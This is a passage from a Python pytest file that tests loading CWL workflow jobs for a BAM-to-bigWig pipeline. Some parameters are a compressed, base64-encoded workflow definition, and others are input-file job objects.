kyWQi9gRo7StOjtwSPizO8dBbQsySL6Pca83Mk53Pg8muwFxcgwzVWaJVhgZk8t02vxRin\
tq69BI74iZeF6aVeX74F2B6bZJGPO7zdYV8ZDuWfU3jc1ubJDXgM+rG3x4YtZzwdttg//8\
kaX3nDVuf5sOVaJg1bA/iUeuNh6ynoV5olkZ1Iv4gGN5Q+nS8uqXt7o7fRcVUofN52tjof\
Nz/Z527+fLMLb9x/SBHRU/YLEvyUfXva+kRmdSYWWfZC+lc8qTEqoIdvs1BrgJA3XhIkcs\
z7PXvk9wfXfbe/C+KqW+xiCY1aSK8PRQRmeUoDYqlEquW/tQsD4AzM+EvYajjrp6/DiBHv\
QXRwOCP72z335+HQBa36qSc6Ltj2tL3IvthLZ53O8w1HwMCNAfzeeIqwDL8/anhd1jzzE4\
z9ZkyTdQdg49Mo0nGwABFoPTzRjodM4Oxg7VOZgk+AT+aZwm1RckbsQjsMDrVnwMjedDLp\
XfuTfXcYvdXLA8OoeMh9nCIjOmzGnjIGIscNYuUR6rGhcL1b83wt639FI0xE4BxnWl66dr\
DM2Uw8YqecB0RjeMtuZjxijmCT0Ju67KJwXIhYWFJa8aRWeEyW47h9ymv42IpQGbulVXHw\
R3BRxlyZOXju3M7HoKA0CzYfPsI9SL8D/e8XsyFWMWSntP53PAYpkjT0zkYiXHZ4aw+Pbu\
4KsdwVYjciDNFwAA7wqthMqFTCAThHYVoDN4zQwqU1llnfCI8aMizugoQ7hlWr3MtVy9ut\
iluDKS35PHdCV3qfoLnHaJ7zQbR7UeZzYIuAE0rrfgqrN1OAVbBmAMeBLNiOMW0QAPRe8U\
kWksmPcDuF4guOKOHvMu5O3a6xyTH4r3PgMSyItd+9fdMBGA57oSWCJIAxecqEy2FGFtEK\
AxrSfvn67ODCcvCuvvMqbv7axM3mswx8YHta0bAOPc3PJdRzOqe+MR7Cxi8NbyAUDFNltn\
Xcl88ow16GeeHoO4txnV6IXtj3Bg64kvK6UUCRTOtxwGp/cZUMHtdkQIBKi0iBmhQMMr0A\
a42HNKja4fGLrT4Dw5cIrnANAexTAYYf3xReOSgOHXN6P5f1Et68RDgm/FRdreyZAnC4f4\
5OXh28A7yngBNdzWHrBfwlY/SWgXI1jICXIppwfQ6Mwe5fKdoFy3ERzY3YDnH6kcwiOJPo\
7/MUPGcYhqjpwXEUAM6J4CHsobbeHr4Ms3mE8utubXW3+riV7hDXrBLHk5o4iiBmwem/Tx\
gEhH0QcAKjcAwDjEMIwkshNPfA7O7mC2ob/14o84jt6mOifX7x7uT0VWdgDfkvqAzOXaPR\
laZ0s7r02C8vG0FT3Irwwdj/DtYcdEGg72V3XfZ9eLeqeAHMt7vGO8CoSrzTFOp0UMvsCW\
3gWOmgWGRi9DbfCuQeDO8ahq9cW7+6tomqGKvmyD0/4D/fH992FR/CKDNTzscQaTAPLLyd\
pcDgA/884yLs7wF3P6M+y2EEagxI4NCDWegyImdzf8BlJ0kCTt+1hxqADHQC2q5OHjCgwp\
6cXhy/On6Xm62d71OSR9WF7azfkjtwXBWLBGsEkR1oDLwBRsPGy/dsTtr295G2UyVtez1p\
2/clrRbkrclznC4mN0pRMIKsB//ai7u0NC464yoNYHwJx6sc9EJSaBGVmZ07E6wWPtZj2O\
fLXgyWhb3tjol8MKUAkYcJwMmbtj4uvsvd3BY60j/hVBV7PtdsoNBylqbxoNdT/ozPPVcm\
0x6J4Cf9QDvoOEZVB13rdEAPha1S+yYJJoRJDazDv5h8JO9/EMibCFzg4H0SWioQQ+LduF\
PYoNkYTrEE3FgIoVIXTGzv0EvUlXBCb9y7MdluBR4MqFLSIwy95jynRufLgGN8AEook9sy\
Ro1tKQo9HQP3SPESv25ublwPWDnjxA4zQPVenxwdn54fO32dIlEDod6CaT+b6DyKDejV4A\
gdHXHN8UBuVViGwgRn2eb02WswCRmomh6VFQwDMnwaexMWgoO1ImSZ1FIIanCWTL1IfNHp\
UL0sPvXCU4sW3CkRRfCaHc1EGCQ82lDsN6likYJT+YYHAjxCdsRxs5r5JvmxgOqthPAjPA\
gCzOTosZ7+QE6PlsD784PKq9cADZy+2yoxlSHv+NTkoM5+0y9iwnQE4sWnj3b6/Sf6BZwT\
nKeWBHi3DT/sELYhmKGDa8PNFE70eCYjmv3LVntna7uzu73rPOpvmpwJrnIqyxqDovdz+n\
zDK0UicHpz4JPXK97/R38zH9KbhnLshfBIzbyEB738jYNInIjfuHE0NTuEYzaVkj33lORB\
GPJkekvW6WQ+zyIJ0G//KFS9O9g7rrgHbheo5ViPmnMTjdV0AE4IC8iq9htgl8dD9neZhs\
IzWgQHhyCdxt+pHMwFcMe90kP+NsWnuD2NWAHSgUmPiaC0E2Tii4BkgLGNA//1nd1Hj3ed\
7cdPHoMo7f9KqSI4LIrwSC1mtdG70vmcsTfvlVJB4GKhvz9aTCeMhtEwesFjTrYTk0OjIm\
c1KlJCDBRa2HAtTyrBmRcMMAQb/YyJsxE+YCPKjY26Oho0T0YuIhpRjDYiQY8aormRMSxg\
fxRF21HhLRZB4khHwiPwcACzAVmL+yD4mHH/CmgDrM2Y9ASMT4meIu608DFsG62IPTUB5N\
4asmGPDCOE2G3ktc7dIEcEDDamksJc5D1F9ZpNS6zoKM8dGwNdAJG12omJTlBAOpE2WoBV\
45iLerAATGsAoYTxI0wvm2Xb1LyaySzE8kzJnWlr5mPmThmFMtnrUadbUioBIWMWBzQHwt\
VRnssGHJYYdBdoSaZMUyZOqLIPVU1sVvTYAnGHZoN7Y+PxvFewdQZNibaPZ28vTs5Ozz9h\
ErKSWGXOlD3TA/dRXjqRoQboO5HyD9NhWkvsAqmVpK6rHS3GitzuJSZ3L5uzu4gGgAcIeS\
FvCBEqVbPMgWDnsDaFDmAsHFx/UK5bd3L8OZ/5zLsW4JViZlWaDFo5wehaGr58BxFfeCJX\
UaHB6dAO1DJycELhhH8/teNpiVpNKcohLyxpYTDMfwQ8haMbQn/F+cAi1MtxM1/5Lg+y3l\
SGAY/eeumsN+Nh3LPlJ3eWzsMcp3cHpF08X0APrzlrw5SCF7/JGw5Hug78KA8jScEwJzEt\
QkLkkJ2S2wA4gSB8VLLIgLILhAAhJTiHqAsszWf9ngn/CvgNGzLx/JTiTosCdpBnZUnoNh\
dwYeY2jsNbOLwGbNiaAkrm3LDNnyB8ApkUm9XKQufIcG/80aSZpmR56ky//4MJNA3kXmm0\
Et4/nkzTwNan1DRvKXOCzP3uDJjG9wPyYBrQimwYURz7y6nN01k281IIfXlCCGBOFMIE/v\
uo52Rq86pHtf2iFNRTpkoXQe6EJMiI8D8183UnQnaWM/Du2RWrQNvLgW3fG9jc+0zg7pnQ\
0mu+R1rLbJHG5FauhUWKS+8UdO6QursXozSoH1aS0uB+RGHKrnFteSpnhi1SESvw2L/C5o\
YhBp6wxdn7o/Oj3is69p3DBEwGHnw4iuEwdDdFpO26EcxEJHAk0MuKg1bCec5BfjzROa85\
csRYWkZeWDP83ADrHxM03dMaWwpOzy6OB+wDmguMY4DLHsvXXkLaLXuYubk2hxecfUJvvO\
InizEnpL1XnKo5xyzn0MAzH7w63PyIr1udfvj+gh0dnCJ9iAEUD2SPnh9uB5h6WHTjgB/V\
Q6s+h9MM6K+yPt93hAS8BTgGPyQCg8RS3NYsxzyuUosiLQnx+LM3j0NeEkuBjG2gb703bL\
25ZRf4EM6La6HEWGB6ZK+PxkEme/2dne72Jvx/owCC3i8hzbTXrne+83smkXiILG9lxsDV\
w/YszAMijfAoKZFd1u6L4//Ryo1wtUPe3uosNA+YmKXaQEDHb5pkPkRW+BGPXfKaCMzK9g\
IcgEafayZ12W/ZHJSmPZtuPenQdBi9NUz7j570dzZ3+1vmUR8fbW89ebL96zY+cl3XDn58\
OQ0xJ7D56yUaBgkxxaP+bl/javf1mnR8gca67YiOXpvtEJkmMotNv2reZErgD4DLSCY6YO\
igOlcMXAn2DODss33929UhCAiSYlaVYSspN2rW3q6gB8PUprCnRsFiFGPQA15vrsMtIuAZ\
gNgHVEYsZWQXItb8P4t0cwzqCeoLHlS17bah2Jvb8/96zSCg9CgMhE1kfFvDVttriy6Acm\
syc8E4x4JTIIfj57fq95A5DmZ294z6OM5MqtR8cmiE66viRGLOAXOAs0MEAOukrhuNuWv6\
PtETQMXQ3Rcn0UTC0vf1Iw3XVBVEtNj5VHQuVxpaTBqAChzjaa3krYrePHq2vIMAyJ1gfx\
mmMGodBLAx+PIqP06sV/kXiyINHaHVqmjxd0Npr/ag1KXSyjsjmrsuGh+Xy9D2L1sl1a2e\
ZhFUUWiswHwiPpf7Hf/FmhCnfG0DYqkTpDYS366sAz0FXagOAIej6Pdc22r4g3sIlS8CLx\
5cb7qbbn+hf7BC2r1bCB9RneyK35ZnFiC8JPEoXw2GZK6Kql8z2KIWeaXrbyvLl6VqpXPV\
hQMIqNh7e3a+9bEL//Y/DdFZpdwHvMAgDd+B54hhWWo+91lbJmIKtnPr/6tkuYzbptZYrz\
u2G1S13ek01QsR8l9WHoRNmH12iIQ/qyxYoHgoBz6UAx/Kgf9C5cCDCFZ7y/4OJHjgrF43\
1wP1KDcf9Tffn8195O+9S4JbzpOtzb6zs/t4C0uCXfZvWLFUlNhHn1z7vqOKKR5hfACW61\
5VLwozyJsRAaagcGNj/agKuUuVyTvUvcredt1PqF8z6TV6giXnoHDFP7YgrMJX/W4/Aken\
7E+WkeRuZON9nX/fey155W7P+ocV//8O/iFCSaTE6zF5BW/d/ZSnpTs1eDuGUiilKzFtDR\
Bf4gUaC/cXmDHAV7/8+NstGByiHwBRiBpcb+88XryPuvaa1erW0JKT+BKzIyYbX7k/ZS+V\
QoRPHiP8BicR/qVgcP/Olz7WN4yWr7fcSMcQs/qqq36BkkD6dIaehK4sZaBe39UAWOv/Qz\
AlAl8IRVc/sZxj1N0eCOjLX8Y8uVShTO/W66nQPIELCR8mHoTJiHrp7QhCAGf4OYDfK9N0\
qlvb5USfmrFEHWTjLApCTEylDNwqjik6fs3DolIOluKRoZ3qVPfoiV1Nd+0eAgHHzNcSom\
ldeB5rilGQiYPujFvUb/s7u/cLRNa28TakNKpJDdrvX22y0JwGq/oVcVg127GY76jeayiy\
MOV75BMYnnbZjU7IljLMpcuWyK4aDd0hmKkZT26EKnorVOl6LBrTpfQ3xWR3u0NaZjI6fH\
V+Lun9/MEcXpJyqPKcVtjQT0qH3oXU6fO/LFbEY9+xJ3sqjTn/s8LGRmwPEeRDBPkQQT40\
lK5qKNVFR1U4i2i5C8vk3jsyW/qtEHeNx6yTkANb2edX8Z2LVj/bPsVZucPwZxMQlFpbF3\
sCM+oJRFNTtyVglvIeRe3QulRKQtvtjm/oNh/1QxSjsPkKuFE45bod0JRaqRMsL6qucdCp\
TbWElECnhYeNkHvv372+k0+NwDTV1ENXeCVg/vlnLTPgYa4EJ7q6D9oN2h7esmfBeB9nYj\
1MV/mwJNetEGgq5x4Dolgorjgu1KjrbGqNYKWAVi7pIwr8uor/FbGiD24JOHhHCVWH595t\
XhXUgSyb8NSfHdkCLfmiFpnu9yjRWCwPtbC+Gm9hrF1USblvGcTnEfhMwwikcShSLOpZPc\
0Z5vbHIrXoivJpJUar1U67+cKySHzWxVJfuzqkM6Z8i9Vb5wqzDMymLwr922e1J8C4cr9q\
4c2fYqfE/b147HktRzJVMN8RwQBAOFYAivWcA0myQV6UwrRa4qYeQq/+IpKmMLfh4ZIyZu\
37csqJnbKPrVM+f8ktJm+e+4LOn+x4NuB6cDsf3M4Ht/PB7Wx2O/MNlrueovJVe7r7zbiM\
yMuKiVTUF1T9cr7SJZTGb+ljbZMGpxejWkp/RF8jp3vo6EYRZpjNVaS6d6oNcpJRq6hxiw\
v7BeIWPl31wJYiFDb18rFRnpwa6X5uclw1nmFkEIEzGvAlxKEd9q6lCLCVSglMWI4z9EYZ\
nLR4DGtvF6wldaTbW0GEVrcP24PVJlbK17FmHrhxYgquK6xTyATOAoblDfI8Rs03n9CBCb\
EbHK8U2JtGla/vyK9RFTe3gBDA2nQzqk2rXFh8R18IgXWCI4YOP7X8a4YtufnlMtiGuSSA\
uxVRGB433rw1d9Rq1n2kmyWrmTt9IQlJa4xz9JcZjRbanZbC0hf0F7/sTmu3vp6G656APC\
MfUTcj1dFSVOLV4nIW461hhCyraQgzAQL9HchoI9V9mCMds1hF zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr4_100_mapped_reads.bam",
os.path.join(DATA_FOLDER, "jobs")
)
},
"chrom_length_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr_name_length.txt",
os.path.join(DATA_FOLDER, "jobs")
)
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr4_100_mapped_reads.bam",
os.path.join(DATA_FOLDER, "jobs")
)
},
"chrom_length_file": {
"class": "File",
"location": get_absolute_path(
"../inputs/chr_name_length.txt",
os.path.join(DATA_FOLDER, "jobs")
)
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
None
)
]
)
def test_load_job_from_object(job, workflow, cwd):
pickle_folder = tempfile.mkdtemp()
if (isinstance(workflow, str)):
workflow_path = workflow
else:
workflow_path = os.path.join(DATA_FOLDER, *workflow)
try:
job_data = load_job(
workflow=workflow_path,
job=job,
cwl_args={"pickle_folder": pickle_folder},
cwd=cwd
)
except BaseException as err:
assert False, f"Failed to load job from parsed object"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow, cwd",
[
(
{
"bam_file": {
"class": "File",
"location": "./inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "./inputs/chr_name_length.txt"
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
None
),
(
{
"bam_file": {
"class": "File",
"location": "./inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "./inputs/chr_name_length.txt"
},
"scale": 1
},
# bam-bedgraph-bigwig-single.cwl
"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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
None
)
]
)
def test_load_job_from_object_with_default_inputs_folder(job, workflow, cwd):
pickle_folder = tempfile.mkdtemp()
inputs_folder = tempfile.mkdtemp()
if (isinstance(workflow, str)):
workflow_path = workflow
else:
workflow_path = os.path.join(DATA_FOLDER, *workflow)
# copy input files
shutil.copytree(
os.path.join(DATA_FOLDER, "inputs"),
os.path.join(inputs_folder, "inputs")
)
try:
job_data = load_job(
workflow=workflow_path,
job=job,
cwl_args={
"pickle_folder": pickle_folder,
"inputs_folder": inputs_folder
},
cwd=cwd
)
except BaseException as err:
assert False, f"Failed to load job from parsed object"
finally:
shutil.rmtree(pickle_folder)
shutil.rmtree(inputs_folder)
# As we don't check links when loading job anymore, this test is not relevant anymore
# @pytest.mark.parametrize(
# "job, workflow, cwd",
# [
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/chr4_100_mapped_reads.bam"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/chr_name_length.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "chrom_length_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
# "scale": 1
# },
# ["workflows", "bam-bedgraph-bigwig.cwl"],
# None
# ),
# (
# {
# "bam_file": {
# "class": "File",
# "location": "../inputs/dummy.txt"
# },
